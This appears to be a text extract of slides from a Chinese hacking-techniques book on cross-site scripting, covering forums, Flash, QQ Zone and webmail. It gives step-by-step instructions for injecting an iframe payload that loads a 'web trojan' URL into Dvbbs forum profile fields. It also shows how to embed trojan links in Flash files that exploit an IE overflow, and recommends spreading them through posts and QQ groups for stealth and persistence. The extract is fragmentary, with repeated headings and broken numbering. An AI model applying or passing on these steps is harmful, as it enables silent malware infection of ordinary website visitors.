文档介绍:黑客攻防秘技实战解析(第2版)跨网站攻击技术♂典型的跨站攻击实例演示♂跨站攻击技术演变♂邮箱跨站攻击♂搜索引擎的跨站攻击典型的跨站攻击实例演示具体的操作步骤如下:步骤1:打开动网论坛首页,如图6-1所示。先在论坛注册一个用户,单击【登录】按钮进行登录,登录后的界面如图6-2所示。典型的跨站攻击实例演示具体的操作步骤如下:步骤3:选择【用户控制面板】→【联系资料修改】菜单项,即可打开个人资料修改页面,如图6-3所示。步骤4:在“论坛密码”栏中输入论坛密码,在“主页地址”栏中输入代码“</Script><IfRA ME height=0 width=0 sRc=”http//网页木马地址”></IFrAME>”。另外,还需要在“MSN号码”栏中输入代码:<Script Language=JavaScript>varactioninfo3='单帖屏蔽',如图6-4所示。典型的跨站攻击实例演示具体的操作步骤如下:步骤5:单击【更新】按钮,即可提交修改资料内容。若提交成功,即可弹出提示信息“你的修改信息已成功提交!”,如图6-5所示。步骤6:提交成功后返回论坛,回复或新发一篇帖子,帖子的内容可以随意填写。发表成功后再查看新发的帖子,即可发现在新发的帖子页面中已经嵌入了一个网页框架,在框架中显示了“新起点工作室”的页面,如图6-6所示。跨站攻击技术的演变1 不安全的客户端过滤2 编辑转换也可以跨站3 Flash跳转的跨站攻击4 :打开Icode To SWF工具,单击“SWF文件”后面的【选择】按钮,选择本机上某个正常的Flash文件;在“插入代码”栏中填写刚才的网页木马的链接地址。步骤2:单击【给我插】按钮,即可将网页木马链接插入到正常的Flash文件中了,如图6-17所示。SWF插马工具生成的Flash文件是利用了一个IE漏洞,对方打开Flash文件后,就会造成IE溢出,自动访问木马网页在后台下载运行网页中的木马程序。***在新帖页面中单击【插入Flash】按钮,在弹出对话框中输入SWF木马文件的网络链接地址,并设置其尺寸大小,单击【插入】按钮插入Flash文件,如图6-18所示。在发表新帖子后,当有人在QQ群中打开查看这篇帖子时,就会自动播放Flash并在后台下载运行木马服务端了。当然,也可以直接在QQ群中散布SWF木马文件的网址,别人单击后一样会中木马,不过这种方式不如发表帖子隐蔽的效果好,攻击的持续性也不强。-Zone溢出跨站打开QQ空间后,在页面中单击【自定义】按钮,在自定义工具栏中单击【模块】选项卡,单击【新建模块】按钮,在其中选择新建一个Flash模块,在【添加Flash模块】对话框中的“Flash动画地址”栏中输入Flash溢出木马的网址,如图6-19所示。单击【确认】按钮,即可完成模块的添加。在提交自定义模块代码后,用户进入该QQ空间时会自动打开显示上传的SWF木马Flash,从而在后台下载运行木马服务端程序。邮箱跨站攻击1 邮箱跨站的危害2 ::126邮箱的跨站测试